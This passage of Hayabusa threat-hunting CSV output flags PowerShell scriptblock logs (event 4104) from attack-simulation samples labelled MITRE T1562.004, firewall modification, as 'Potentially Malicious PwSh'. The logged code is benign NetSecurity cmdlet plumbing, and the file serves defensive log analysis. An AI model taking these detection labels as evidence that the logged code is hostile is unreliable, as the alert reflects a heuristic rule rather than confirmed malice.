[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 